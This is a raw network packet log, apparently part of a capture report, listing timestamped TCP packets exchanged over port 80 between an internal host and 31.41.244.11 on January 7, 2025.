Jan 7, 2025 10:09:05.881597042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881608963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881623983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881633043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881653070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881654978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881671906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881691933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881701946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881702900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881716013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881743908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881768942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881782055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881793976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881794930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881804943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881817102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881834030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881876945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881911993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881925106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881934881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881946087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881958008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881974936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881989956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882035017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882086992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882098913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882110119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882119894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882131100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882142067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882142067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882155895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882175922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882186890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882226944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882239103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882244110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882251978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882263899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882275105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882285118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882287979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882297039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882339954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882339954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882385969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882397890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882409096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882419109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882430077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882443905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882455111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882455111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882462978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882503033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882503033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882519960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882625103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882637024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882649899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882661104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.882688046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.882700920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.913867950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.913880110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.913888931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.913937092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.913939953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.913948059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.913959026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.913990974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914016962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914016962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914020061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914031029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914036036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914062023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914069891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914078951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914084911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914107084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914133072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914149046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914150000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914161921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914174080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914179087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914196968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914225101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914241076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914251089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914262056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914273977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914279938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914293051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914294004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914309025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.914328098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.914355040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.932965040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.932976961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.932982922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.933046103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.933056116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.933060884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.933068037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.933079004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.933126926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.933126926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.965739965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965759993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965778112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965789080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965801001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965827942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965838909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965848923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.965873957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.965879917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965890884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965890884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.965905905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.965918064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966090918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966115952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966126919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966135979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966135979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966137886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966145039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966154099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966160059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966169119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966176033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966186047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966197014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966209888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966232061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966232061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966273069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966295958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966305971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966335058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966335058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966357946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966587067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966614962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966624022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966649055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966659069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966664076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966686964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966689110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966705084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966716051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966736078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966739893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966749907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966773033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966799021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966854095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966872931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966883898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966912031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966924906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966937065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966937065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.966970921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966981888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.966984987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.967000008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.967016935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968075991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968086004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968112946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968123913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968132973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968139887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968156099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968162060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968167067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968189955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968195915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968210936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968228102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968229055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968229055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968240976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968252897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968286037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968286037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968290091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968301058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968312025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968321085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968336105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968347073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968360901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968360901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968390942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968405008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968408108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968419075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968430996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968446016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968456030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968466043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968516111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968516111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968517065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968560934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968569994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968586922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968599081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968607903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968616962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968621969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968622923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968631029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968631029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968652010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968662977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968673944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968698025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968708038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968713999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968719006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968719959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968719959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968736887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968787909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968787909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968801022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968811989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968822002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968831062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968854904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968924999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968935013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968946934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.968996048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.968997002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.969010115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969032049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969042063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969065905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969075918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969085932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969094992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969103098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.969103098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.969105959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969119072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969127893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.969153881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.969153881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.969191074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000627041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000663042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000672102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000678062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000686884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000710964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000722885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000731945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000742912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000742912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000756979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000786066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000787020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000787020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000798941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000809908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000813007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000829935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000857115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000880003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000889063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000901937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000912905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000922918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000931978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000948906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000971079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.000973940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.000988960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001003981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001013994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001046896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.001046896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.001086950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001096964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001106024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001122952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001132011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.001152992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.001152992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.001164913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.019666910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019685984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019697905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019731998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.019763947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.019773006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019783974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019794941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019800901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019828081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.019860983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.019890070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.052726984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052742958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052762985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052778959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052789927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052803040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052803040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.052803040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.052814960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052826881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052860022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.052874088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.052980900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052990913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.052999973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053009987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053020000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053030014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053046942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053046942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053072929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053109884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053119898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053129911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053138971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053148985 CET	80	50017	31.41.244.11	192.168.2.4
